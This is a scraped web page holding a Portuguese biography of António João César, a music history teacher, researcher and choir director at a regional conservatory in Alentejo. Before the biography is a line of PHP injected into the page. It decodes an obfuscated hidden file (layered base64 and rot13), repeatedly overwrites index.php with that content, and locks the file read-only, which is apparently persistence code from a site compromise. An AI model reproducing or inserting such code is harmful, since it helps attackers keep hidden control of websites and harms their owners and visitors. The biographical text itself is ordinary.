$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } António João César – História da Cultura e das Artes – Conservatório Regional do Baixo Alentejo

António João César – História da Cultura e das Artes

Nasceu em Lisboa (1976). Professor e investigador. Estudou percussão com o professor Carlos Voss na Escola de Música e Bailado de Linda-a-Velha (actual escola de Música Nossa Senhora do Cabo) e na Escola de Música do Conservatório Nacional de Lisboa. Formou-se em Ciências Musicais (Faculdade de Ciências Sociais e Humanas da Universidade Nova de Lisboa) e em Ensino de Música (Escola Superior de Artes Aplicadas do Instituto Politécnico de Castelo Branco). Estudou com os professores Salwa El-Shawan Castelo Branco, Luísa Correia Castilho, José Raimundo, Mário Vieira de Carvalho, Rui Vieira Nery, Manuel Carlos de Brito, Manuel Pedro Ferreira, Jorge Matta, Manuela Toscano, Gerhard Doderer, João Soeiro de Carvalho, Tomás Henriques e Luisa Cymbron, entre outros. Trabalhou como consultor no extinto Instituto Português das Artes do Espectáculo (Ministério da Cultura) e como investigador no Instituto de Etnomusicologia da Universidade Nova de Lisboa, destacando-se, entre outras actividades, a sua participação como membro da equipa editorial da Enciclopédia da Música em Portugal no Século XX (Lisboa: Círculo de Leitores, 2010), bem como a sua colaboração na obra Vozes do Povo: a folclorização em Portugal (Oeiras: Celta, 2003). Como docente leccionou várias disciplinas, nomeadamente: História da Música, Sociologia da Música, Produção de Espectáculos, História da Música Portuguesa, História do Fado, Acústica, Novas Tecnologias Aplicadas à Música, Ensino de Música, Expressão Vocal e Instrumental, Harmonização ao Teclado, Formação Musical, Iniciação Musical e Coro (Escola Profissional da Ilha Graciosa; Escola Superior de Educação de Beja; Escola Profissional Bento de Jesus Caraça; Conservatório Regional de Vila Real de Santo António; Conservatório Regional do Baixo Alentejo; Instituto Superior Dom Afonso III; Musibéria; Escola das Artes do Alentejo Litoral). Colaborou com vários coros, nomeadamente o Coral de Linda-a-Velha (desde 1992), o Coro de Câmara de Setúbal (de 2005 a 2007), o coro Opus 21 (de 1998 até 1999) e o Coro Polifónico de Castro Verde que dirige desde a sua fundação (2010).

Leave a Reply

Your email address will not be published.